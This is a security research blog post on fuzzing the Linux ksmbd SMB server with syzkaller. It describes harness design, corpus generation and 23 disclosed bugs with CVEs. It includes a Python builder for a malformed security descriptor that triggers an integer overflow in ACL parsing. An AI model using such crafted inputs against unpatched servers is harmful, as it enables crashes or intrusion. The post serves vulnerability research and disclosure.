ksmbd - Fuzzing Improvements and Vulnerability Discovery (2/3)

02 Sep 2025 - Posted by Norbert Szetei

Introduction

This is a follow-up to the article originally published here.

Our initial research uncovered several unauthenticated bugs, but we had barely touched the attack surface. Even after patching the code to bypass authentication, most interesting operations required interacting with handlers and state that we had initially omitted. In this part, we explain how we increased coverage and applied different fuzzing strategies to identify more bugs.

Some functionality requires additional configuration options. We enabled as many of the available features as practical to maximize the exposed attack surface. This helped us trigger code paths that are disabled in the minimalistic configuration example. However, to simplify our setup, we did not consider features like Kerberos support or RDMA. These could be targets for further improvement.

Configuration-Dependent Attack Surface

The following functionalities helped expand the attack surface. Only oplocks are enabled by default.

G = Global scope only
S = Per-share, but can also be set globally as a default

durable handles (G)
oplocks (S)
server multi channel support (G)
smb2 leases (G)
vfs objects (S)
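To make the scoping concrete, here is a minimal sketch that renders a ksmbd.conf-style file with the listed options placed in the scope where they apply. The option names come from the list above; the share name, the path, the "yes" values, and the vfs objects value are assumptions for illustration, not our exact configuration.

```python
# Hypothetical helper: renders a ksmbd.conf-style file from Python dicts.
# Share name, path, and option values are illustrative assumptions.

GLOBAL_OPTS = {
    "durable handles": "yes",               # (G)
    "server multi channel support": "yes",  # (G)
    "smb2 leases": "yes",                   # (G)
}

SHARE_OPTS = {
    "path": "/tmp/share",                      # assumed export path
    "oplocks": "yes",                          # (S)
    "vfs objects": "acl_xattr streams_xattr",  # (S), assumed value
}

def render_conf(global_opts, shares):
    """Emit a [global] section followed by one section per share."""
    lines = ["[global]"]
    lines += [f"\t{key} = {value}" for key, value in global_opts.items()]
    for name, opts in shares.items():
        lines.append("")
        lines.append(f"[{name}]")
        lines += [f"\t{key} = {value}" for key, value in opts.items()]
    return "\n".join(lines) + "\n"

conf_text = render_conf(GLOBAL_OPTS, {"fuzz": SHARE_OPTS})
print(conf_text)
```

Options marked (S) could equally be moved into the [global] dictionary to act as defaults for every share.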

From a code perspective, in addition to smb2pdu.c, these source files were involved:

ndr.c – NDR encoding/decoding used in SMB structures
oplock.c – Oplock request and break handling
smbacl.c – Parsing and enforcement of SMB ACLs
vfs.c – Interface to virtual file system operations
vfs_cache.c – Cache layer for file and directory lookups

The remaining files in the fs/smb/server directory were either exercised as part of standard communication or required a more complex setup to reach, as in the case of the various authentication schemes.

Fuzzer Improvements

SMB3 expects a valid session setup before most operations, and its authentication flow is multi-step, requiring correct ordering. Implementing valid Kerberos authentication was impractical for fuzzing.

As described in the first part, we patched the NTLMv2 authentication to be able to interact with resources. We also explicitly allowed guest accounts and specified map to guest = bad user to allow a fallback to “guest” when credentials were invalid. After we reported CVE-2024-50285 (ksmbd: check outstanding simultaneous SMB operations), the credit limits became stricter, so we patched those out as well to avoid rate limiting.

A few minutes after we restarted syzkaller with a larger corpus, all remaining candidates were rejected. After some investigation, we realized this was due to the default max connections = 128, which we had to increase to the maximum value of 65536. No other limits were changed.

State Management

SMB interactions are stateful, relying on sessions, TreeIDs, and FileIDs. Fuzzing required simulating valid transitions like smb2_create ⇢ smb2_ioctl ⇢ smb2_close. When we initiated operations such as smb2_tree_connect, smb2_sess_setup, or smb2_create, we manually parsed responses in the pseudo-syscall to extract resource identifiers and reused them in subsequent calls. Our harness was programmed to send multiple messages per pseudo-syscall.

Example code for parsing these resources is shown below:

// process response. does not contain +4B PDU length
void process_buffer(int msg_no, const char *buffer, size_t received) {
  // .. snip ..

  // Extract SMB2 command
  uint16_t cmd_rsp = u16((const uint8_t *)(buffer + CMD_OFFSET));
  debug("Response command: 0x%04x\n", cmd_rsp);

  switch (cmd_rsp) {
    case SMB2_TREE_CONNECT:
      if (received >= TREE_ID_OFFSET + sizeof(uint32_t)) {
        tree_id = u32((const uint8_t *)(buffer + TREE_ID_OFFSET));
        debug("Obtained tree_id: 0x%x\n", tree_id);
      }
      break;

    case SMB2_SESS_SETUP:
      // First session setup response carries session_id
      if (msg_no == 0x01 &&
          received >= SESSION_ID_OFFSET + sizeof(uint64_t)) {
        session_id = u64((const uint8_t *)(buffer + SESSION_ID_OFFSET));
        debug("Obtained session_id: 0x%llx\n", session_id);
      }
      break;

    case SMB2_CREATE:
      if (received >= CREATE_VFID_OFFSET + sizeof(uint64_t)) {
        persistent_file_id = u64((const uint8_t *)(buffer + CREATE_PFID_OFFSET));
        volatile_file_id   = u64((const uint8_t *)(buffer + CREATE_VFID_OFFSET));
        debug("Obtained p_fid: 0x%llx, v_fid: 0x%llx\n",
              persistent_file_id, volatile_file_id);
      }
      break;

    default:
      debug("Unknown command (0x%04x)\n", cmd_rsp);
      break;
  }
}
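For readers who want to experiment outside the harness, the same extraction can be sketched in Python. The offsets below follow the SMB2 header and CREATE response layouts in [MS-SMB2]; the constant names mirror the C snippet, but whether the harness uses exactly these values is an assumption, and the response is synthetic.

```python
import struct

# Offsets are relative to the start of the SMB2 header (length prefix stripped).
# Values follow [MS-SMB2]; that the harness uses the same values is an assumption.
SMB2_HEADER_SIZE = 64
CMD_OFFSET = 12                             # Command (u16)
TREE_ID_OFFSET = 36                         # TreeId (u32)
SESSION_ID_OFFSET = 40                      # SessionId (u64)
CREATE_PFID_OFFSET = SMB2_HEADER_SIZE + 64  # FileId.Persistent (u64)
CREATE_VFID_OFFSET = SMB2_HEADER_SIZE + 72  # FileId.Volatile (u64)

SMB2_SESS_SETUP, SMB2_TREE_CONNECT, SMB2_CREATE = 0x01, 0x03, 0x05

def extract_ids(buf):
    """Return the identifiers carried by a single SMB2 response."""
    ids = {}
    if len(buf) < SMB2_HEADER_SIZE or buf[:4] != b"\xfeSMB":
        return ids
    (cmd,) = struct.unpack_from("<H", buf, CMD_OFFSET)
    if cmd == SMB2_TREE_CONNECT:
        (ids["tree_id"],) = struct.unpack_from("<I", buf, TREE_ID_OFFSET)
    elif cmd == SMB2_SESS_SETUP:
        (ids["session_id"],) = struct.unpack_from("<Q", buf, SESSION_ID_OFFSET)
    elif cmd == SMB2_CREATE and len(buf) >= CREATE_VFID_OFFSET + 8:
        ids["persistent_file_id"], ids["volatile_file_id"] = struct.unpack_from(
            "<QQ", buf, CREATE_PFID_OFFSET)
    return ids

# Synthetic CREATE response: header plus an 88-byte body, FileId = (0x4, 0x1).
rsp = bytearray(SMB2_HEADER_SIZE + 88)
rsp[:4] = b"\xfeSMB"
struct.pack_into("<H", rsp, CMD_OFFSET, SMB2_CREATE)
struct.pack_into("<QQ", rsp, CREATE_PFID_OFFSET, 0x4, 0x1)
create_ids = extract_ids(bytes(rsp))
print(create_ids)
```

The extracted values would then be substituted into the FileId, TreeId, and SessionId fields of the next request in the sequence.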

Another issue we had to solve was that ksmbd relies on global state, such as memory pools and session tables, which makes fuzzing less deterministic. We tried enabling the experimental reset_acc_state feature to reset accumulated state, but it slowed down fuzzing significantly. We decided not to prioritize reproducibility, since each bug typically appeared in dozens or even hundreds of test cases. For the rest, we used focused fuzzing, as described below.

Protocol Specification

We based our harness on the official SMB protocol specification by implementing a grammar for all supported SMB commands. Microsoft publishes detailed technical documents for SMB and other protocols as part of its Open Specifications program.

As an example, the wire format of the SMB2 IOCTL Request is shown below:

We then manually rewrote this specification into our grammar, which allowed our harness to automatically construct valid SMB2 IOCTL requests:

smb2_ioctl_req {
        Header_Prefix           SMB2Header_Prefix
        Command                 const[0xb, int16]
        Header_Suffix           SMB2Header_Suffix
        StructureSize           const[57, int16]
        Reserved                const[0, int16]
        CtlCode                 union_control_codes
        PersistentFileId        const[0x4, int64]
        VolatileFileId          const[0x0, int64]
        InputOffset             offsetof[Input, int32]
        InputCount              bytesize[Input, int32]
        MaxInputResponse        const[65536, int32]
        OutputOffset            offsetof[Output, int32]
        OutputCount             len[Output, int32]
        MaxOutputResponse       const[65536, int32]
        Flags                   int32[0:1]
        Reserved2               const[0, int32]
        Input                   array[int8]
        Output                  array[int8]
} [packed]

We did a final check against the source code to identify and verify possible mismatches during our translation.
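As a cross-check of the field layout, the fixed part of the request can be packed by hand. This is a minimal sketch, assuming the [MS-SMB2] layout in which the fixed fields occupy 56 bytes and offsets are counted from the start of the 64-byte SMB2 header; build_ioctl_body is a hypothetical helper, not part of our harness.

```python
import struct

SMB2_HEADER_SIZE = 64
IOCTL_FIXED_SIZE = 56  # fixed fields preceding the variable-length buffer

def build_ioctl_body(ctl_code, persistent_fid, volatile_fid, input_data=b"", flags=1):
    """Pack the body of an SMB2 IOCTL request (header not included)."""
    input_offset = SMB2_HEADER_SIZE + IOCTL_FIXED_SIZE if input_data else 0
    fixed = struct.pack(
        "<HHIQQ8I",
        57,               # StructureSize
        0,                # Reserved
        ctl_code,         # CtlCode
        persistent_fid,   # PersistentFileId
        volatile_fid,     # VolatileFileId
        input_offset,     # InputOffset
        len(input_data),  # InputCount
        65536,            # MaxInputResponse
        0,                # OutputOffset
        0,                # OutputCount
        65536,            # MaxOutputResponse
        flags,            # Flags
        0,                # Reserved2
    )
    assert len(fixed) == IOCTL_FIXED_SIZE
    return fixed + input_data

# 0x00140204 is FSCTL_VALIDATE_NEGOTIATE_INFO; the input bytes are placeholders.
body = build_ioctl_body(0x00140204, 0x4, 0x0, b"\xaa" * 4)
print(body.hex())
```

With input present, InputOffset comes out as 0x78, which matches what offsetof[Input, int32] yields when the header is part of the same packed struct.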

Fuzzing Strategies

Since we were curious about the bugs that might be missed when using only the default syzkaller configuration with a corpus generated from scratch, we explored different fuzzing approaches, each of which is described in the following subsections.

FocusAreas

Occasionally, we triggered a bug that we were not able to reproduce, and it was not immediately clear from the crash log why it occurred. In other cases, we wanted to focus on a parsing function that had weak coverage. The experimental focus_areas configuration option allows exactly that.

For instance, by targeting smb_check_perm_dacl with

"focus_areas": [
  {"filter": {"functions": ["smb_check_perm_dacl"]}, "weight": 20.0},
  {"filter": {"files": ["^fs/smb/server/"]}, "weight": 2.0},
  {"weight": 1.0}
]

we identified multiple integer overflows and were able to quickly suggest and confirm the patch.

To reach the vulnerable code, syzkaller constructed an ACL that passed validation and led to an integer overflow. After rewriting it in Python, it looked like this:

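import struct

def build_sd():
    # Fixed-size security descriptor header (0x14 bytes)
    sd = bytearray(0x14)

    sd[0x00] = 0x00                               # Revision
    sd[0x01] = 0x00                               # Sbz1
    struct.pack_into("<H", sd, 0x02, 0x0001)      # Control
    struct.pack_into("<I", sd, 0x04, 0x78)        # owner SID offset
    struct.pack_into("<I", sd, 0x08, 0x00)        # group SID offset
    struct.pack_into("<I", sd, 0x0C, 0x10000)     # SACL offset
    struct.pack_into("<I", sd, 0x10, 0xFFFFFFFF)  # dacloffset

    # Pad up to the owner SID offset (0x78)
    while len(sd) < 0x78:
        sd += b"A"

    # SID header: revision 1, one sub-authority, zeroed authority
    sd += b"\x01\x01\x00\x00\x00\x00\x00\x00"
    sd += b"\xCC" * 64

    return bytes(sd)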

sd = build_sd()
print(f"[+] Final SD length: {len(sd)}")
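To see why a dacloffset of 0xFFFFFFFF can slip past a bounds check, consider a generic 32-bit wrap-around. The sketch below illustrates the bug class only; it is not the ksmbd check itself, and the 8-byte ACL header size is an assumption.

```python
U32_MASK = 0xFFFFFFFF
SMB_ACL_HEADER_SIZE = 8  # assumed: le16 revision, le16 size, le32 num_aces

def naive_check_u32(dacloffset, sd_len):
    """Flawed pattern: the end offset is computed with 32-bit wrap-around."""
    end = (dacloffset + SMB_ACL_HEADER_SIZE) & U32_MASK
    return end <= sd_len

def safe_check(dacloffset, sd_len):
    """Overflow-safe variant: compare the offset against the remaining space."""
    return sd_len >= SMB_ACL_HEADER_SIZE and dacloffset <= sd_len - SMB_ACL_HEADER_SIZE

sd_len = 0x78 + 8 + 64  # length of the descriptor built above (192 bytes)

print(naive_check_u32(0xFFFFFFFF, sd_len))  # True: 0xFFFFFFFF + 8 wraps to 7
print(safe_check(0xFFFFFFFF, sd_len))       # False
```

Rearranging the comparison so that no addition involves the attacker-controlled offset is one common way to close this kind of gap; an explicit overflow-checked addition is another.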

ANYBLOB

The anyTypes struct is used internally during fuzzing and is sparsely documented, probably because it is not intended to be used directly. It is defined in prog/any.go and can represent multiple structures:

type anyTypes struct {
	union  *UnionType
	array  *ArrayType
	blob   *BufferType
    // .. snip..
}

It was implemented in commit 9fe8aa4, and its purpose is to squash complex structures into a flat byte array so that only generic mutations are applied.

The test case illustrates how it works. Here, the structured call

foo$any_in(&(0x7f0000000000)={0x11, 0x11223344, 0x2233, 0x1122334455667788, {0x1, 0x7, 0x1, 0x1, 0x1bc, 0x4}, [{@res32=0x0, @i8=0x44, "aabb"}, {@res64=0x1, @i32=0x11223344, "1122334455667788"}, {@res8=0x2, @i8=0x55, "cc"}]})

translates to

foo$any_in(&(0x7f0000000000)=ANY=[@ANYBLOB="1100000044332211223300000000000088776655443322117d00bc11", @ANYRES32=0x0, @ANYBLOB="0000000044aabb00", @ANYRES64=0x1, @ANYBLOB="443322111122334455667788", @ANYRES8=0x2, @ANYBLOB="0000000000000055cc0000"])

The translation happens automatically as part of the fuzzing process. After running the fuzzer for several weeks, it stopped producing new coverage. Instead of manually writing inputs that followed the grammar and reached new paths, we used ANYBLOB, which allowed us to generate them easily.

The ANYBLOB is represented as a BufferType data type and we used public pcaps obtained here and here to generate a new corpus.

import json
import os

# tshark -r smb2_dac_sample.pcap -Y "smb || smb2" -T json -e tcp.payload > packets.json

os.makedirs("corpus", exist_ok=True)

def load_packets(json_file):
    with open(json_file, 'r') as file:
        data = json.load(file)
    
    packets = [entry["_source"]["layers"]["tcp.payload"] for entry in data]
    
    return packets

if __name__ == "__main__":
    json_file = "packets.json"
    packets = load_packets(json_file)
    
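    for i, packet in enumerate(packets):
        # tcp.payload is a hex string (assumed to have no separators),
        # so two characters correspond to one byte of the PDU.
        pdu_size = len(packet[0]) // 2
        filename = f"corpus/packet_{i:03d}.txt"
        with open(filename, "w") as f:
            f.write(f"syz_ksmbd_send_req(&(0x7f0000000340)=ANY=[@ANYBLOB=\"{packet[0]}\"], {hex(pdu_size)}, 0x0, 0x0)")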
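One caveat with raw TCP payloads is that a single segment may carry several SMB messages, or only part of one. The following sketch, which is not part of the script above, splits a payload on the 4-byte length prefix (one zero byte followed by a 24-bit big-endian length) and keeps only complete PDUs that start with an SMB magic. The helper names and the sample bytes are hypothetical.

```python
def split_pdus(payload_hex):
    """Split one TCP payload (hex string) into length-prefixed SMB PDUs."""
    data = bytes.fromhex(payload_hex.replace(":", ""))
    pdus, pos = [], 0
    while pos + 4 <= len(data):
        length = int.from_bytes(data[pos + 1:pos + 4], "big")
        end = pos + 4 + length
        if data[pos] != 0 or end > len(data):
            break  # not a session message, or a truncated capture
        pdu = data[pos:end]
        if pdu[4:8] in (b"\xfeSMB", b"\xffSMB"):
            pdus.append(pdu)
        pos = end
    return pdus

def to_program(pdu):
    """Render one PDU in the same program format as the script above."""
    return (f'syz_ksmbd_send_req(&(0x7f0000000340)=ANY=[@ANYBLOB="{pdu.hex()}"], '
            f"{hex(len(pdu))}, 0x0, 0x0)")

# Two tiny synthetic PDUs back to back (placeholder bodies, not real SMB traffic).
example = "00000008fe534d4200000000" + "00000004ff534d42"
for pdu in split_pdus(example):
    print(to_program(pdu))
```

Each resulting line can be written to its own file, exactly as the original script does for whole payloads.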

After that, we used syz-db to pack all candidates into the corpus database and resumed fuzzing.

With that, we were able to immediately trigger ksmbd: fix use-after-free in ksmbd_sessions_deregister() and improve overall coverage by a few percent.

Sanitizer Coverage Beyond KASAN

In addition to KASAN, we tried other sanitizers such as UBSAN and KCSAN. There was no significant improvement: KCSAN produced many false positives or reported bugs in unrelated components with seemingly no security impact. Interestingly, UBSAN was able to identify one additional issue that KASAN did not detect:

id = le32_to_cpu(psid->sub_auth[psid->num_subauth - 1]);

In this case, the user was able to set psid->num_subauth to 0, which resulted in an out-of-bounds read of psid->sub_auth[-1]. Although this access still fell within the same struct allocation (smb_sid), UBSAN’s array index bounds check considered the declared bounds of the array

struct smb_sid {
	__u8 revision; /* revision level */
	__u8 num_subauth;
	__u8 authority[NUM_AUTHS];
	__le32 sub_auth[SID_MAX_SUB_AUTHORITIES]; /* sub_auth[num_subauth] */
} __attribute__((packed));

and was therefore able to catch the bug.
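The difference between the two checks can be reproduced with a small layout model. This sketch mirrors the struct with ctypes, assuming NUM_AUTHS is 6 and SID_MAX_SUB_AUTHORITIES is 15; no packing directive is needed here because sub_auth already lands on a 4-byte boundary. The authority bytes are arbitrary markers.

```python
import ctypes
import struct

NUM_AUTHS = 6                 # assumed value of the kernel constant
SID_MAX_SUB_AUTHORITIES = 15  # assumed value of the kernel constant

class SmbSid(ctypes.LittleEndianStructure):
    _fields_ = [
        ("revision", ctypes.c_uint8),
        ("num_subauth", ctypes.c_uint8),
        ("authority", ctypes.c_uint8 * NUM_AUTHS),
        ("sub_auth", ctypes.c_uint32 * SID_MAX_SUB_AUTHORITIES),
    ]

sid = SmbSid(
    revision=1,
    num_subauth=0,  # attacker-controlled
    authority=(ctypes.c_uint8 * NUM_AUTHS)(0, 0, 0xAA, 0xBB, 0xCC, 0xDD),
)

index = sid.num_subauth - 1                     # -1 after integer promotion
byte_offset = SmbSid.sub_auth.offset + 4 * index
in_struct = 0 <= byte_offset and byte_offset + 4 <= ctypes.sizeof(SmbSid)
in_array = 0 <= index < SID_MAX_SUB_AUTHORITIES

# The 4 bytes at that offset are the tail of the authority field.
(value,) = struct.unpack_from("<I", bytes(sid), byte_offset)

print(f"index={index} offset={byte_offset} in_struct={in_struct} in_array={in_array}")
print(hex(value))
```

The read stays inside the allocation, so an allocation-granular checker has nothing to flag, while the index is outside the declared array bounds.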

Coverage

One unresolved issue was fuzzing with multiple processes. Due to various locking mechanisms, and because we reused the same authentication state, we noticed that fuzzing was more stable and coverage increased faster when using only one process. We sent multiple requests within a single invocation, but initially worried that this would cause us to miss race conditions.

If we check the execution log, we see that syzkaller creates multiple threads inside one process, the same way it does when calling standard syscalls:

1.887619984s ago: executing program 0 (id=1628):
syz_ksmbd_send_req(&(0x7f0000000d40)={0xee, @smb2_read_req={{}, 0x8, {0x1, 0x0, 0x0, 0x0, 0x0, 0x1, 0x1, "fbac8eef056a860726ca964fb4f60999"}, 0x31, 0x6, 0x2, 0x7e, 0x70, 0x4, 0x0, 0xffffffff, 0x2, 0x7, 0xee, 0x0, "1cad48fb0cba2f253915fe074290eb3e10ed9ac895dde2a575e4caabc1f3a537e265fea8a440acfd66cf5e249b1ccaae941160f24282c81c9df0260d0403bb44b0461da80509bd756c155b191718caa5eabd4bd89aa9bed58bf87d42ef49bca4c9f08f22d495b601c9c025631b815bf6cbeb0aa4785aec4abf776d75e5be"}}, 0xf2, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0)
syz_ksmbd_send_req(&(0x7f0000000900)=ANY=[@ANYRES16=<r0=>0x0], 0xf0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0) (async, rerun: 32)
syz_ksmbd_send_req(&(0x7f0000001440)=ANY=[@ANYBLOB="000008c0fe534d4240000000000000000b0001000000000000000000030000000000000000000000010000000100000000000000684155244ffb955e3201e88679ed735a39000000040214000400000000000000000000000000000078000000480800000000010000000000000000000000010001"], 0x8c4, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0) (async, rerun: 32)
syz_ksmbd_send_req(&(0x7f0000000200)={0x58, @smb2_oplock_break_req={{}, 0x12, {0x1, 0x0, 0x0, 0x9, 0x0, 0x1, 0x1, "3c66dd1fe856ec397e7f8d7c8c293fd6"}, 0x24}}, 0x5c, &(0x7f0000000000)=ANY=[@ANYBLOB="00000080fe534d424000010000000000050001000800000000000000040000000000000000000000010000000100000000000000b31fae29f7ea148ad156304f457214a539000000020000000000000000000000000000000000000000000002"], 0x84, &(0x7f0000000100)=ANY=[@ANYBLOB="00000062fe534d4240000000000000000e00010000000000000000000700000000000000000000000100000001000000000000000002000000ffff0000000000000000002100030a08000000040000000000000000000000000000006000020009000000aedf"], 0x66, 0x0, 0x0) (async)
...

Observe the async keyword, which is added automatically during fuzzing and allows commands to run in parallel without blocking (implemented in commit fd8caa5). Hence, the seemingly absent parallelism did not cause us to miss UAFs.

In the end, based on syzkaller’s benchmark, we executed 20-30 programs per second across 20 VMs, which still potentially meant running several hundred commands per second. For reference, we used a server with an average configuration - nothing particularly optimized for fuzzing performance.

We measured coverage using syzkaller’s built-in function-level metrics. While we’re aware that this does not capture state transitions, which are critical in a protocol like SMB, it still provides a useful approximation of code exercised. Overall, the fs/smb/server directory reached around 60%. For smb2pdu.c specifically, which handles most SMB command parsing and dispatch, we reached 70%.

The screenshot below shows coverage across key files.

Discovered Bugs

During our research period, we reported a total of 23 bugs. The majority are use-after-free or out-of-bounds read or write issues. Given this quantity, the impact naturally varies. For instance, “fix the warning from __kernel_write_iter” is a simple warning that could only be used for DoS in a specific setup (kernel.panic_on_warn), “validate zero num_subauth before sub_auth is accessed” is a simple out-of-bounds 1-byte read, and “prevent rename with empty string” will only cause a kernel oops.

There are additional issues where exploitability requires more thoughtful analysis (e.g., fix type confusion via race condition when using ipc_msg_send_request). Nevertheless, after evaluating potentially promising candidates, we were able to identify some powerful primitives, allowing an attacker to exploit the finding at least locally to gain remote code execution.

The identified issues are listed below:

Description	Commit	CVE
prevent out-of-bounds stream writes by validating *pos	0ca6df4	CVE-2025-37947
prevent rename with empty string	53e3e5b	CVE-2025-37956
fix use-after-free in ksmbd_session_rpc_open	a1f46c9	CVE-2025-37926
fix the warning from __kernel_write_iter	b37f2f3	CVE-2025-37775
fix use-after-free in smb_break_all_levII_oplock()	18b4fac	CVE-2025-37776
fix use-after-free in __smb2_lease_break_noti()	21a4e47	CVE-2025-37777
validate zero num_subauth before sub_auth is accessed	bf21e29	CVE-2025-22038
fix overflow in dacloffset bounds check	beff0bc	CVE-2025-22039
fix use-after-free in ksmbd_sessions_deregister()	15a9605	CVE-2025-22041
fix r_count dec/increment mismatch	ddb7ea3	CVE-2025-22074
add bounds check for create lease context	bab703e	CVE-2025-22042
add bounds check for durable handle context	542027e	CVE-2025-22043
prevent connection release during oplock break notification	3aa660c	CVE-2025-21955
fix use-after-free in ksmbd_free_work_struct	bb39ed4	CVE-2025-21967
fix use-after-free in smb2_lock	84d2d16	CVE-2025-21945
fix bug on trap in smb2_lock	e26e2d2	CVE-2025-21944
fix out-of-bounds in parse_sec_desc()	d6e13e1	CVE-2025-21946
fix type confusion via race condition when using ipc_msg_send_req..	e2ff19f	CVE-2025-21947
align aux_payload_buf to avoid OOB reads in cryptographic operati..	06a0254	-
check outstanding simultaneous SMB operations	0a77d94	CVE-2024-50285
fix slab-use-after-free in smb3_preauth_hash_rsp	b8fc56f	CVE-2024-50283
fix slab-use-after-free in ksmbd_smb2_session_create	c119f4e	CVE-2024-50286
fix slab-out-of-bounds in smb2_allocate_rsp_buf	0a77715	CVE-2024-26980

Note that we are aware of the controversy around CVE assignment since the Linux kernel became a CVE Numbering Authority (CNA) in February 2024. My personal take is that, while there were many disputable cases, the current approach is pragmatic: CVEs are now assigned for fixes with potential security impact, particularly memory corruptions and other classes of bugs that could potentially be exploitable.

For more information, the whole process is described in detail in this great presentation, or the relevant article. Lastly, the voting process for CVE approval is implemented in the vulns.git repository.

Conclusion

Our research yielded a few dozen bugs, although using pseudo-syscalls is generally discouraged and comes with several disadvantages. For instance, in all cases, we had to perform the triaging process manually by finding the relevant crash log entries, generating C programs, and minimizing them by hand.

Since syzkaller can tie syscalls together through resources, the same mechanism could also be applied to ksmbd, where the interaction consists of sending packets. It would be ideal for future research to explore this direction - SMB commands could yield resources that are then fed into different commands. Due to time restrictions, we followed the pseudo-syscall approach, relying on custom patches.

For the next and last part, we focus on exploiting CVE-2025-37947.
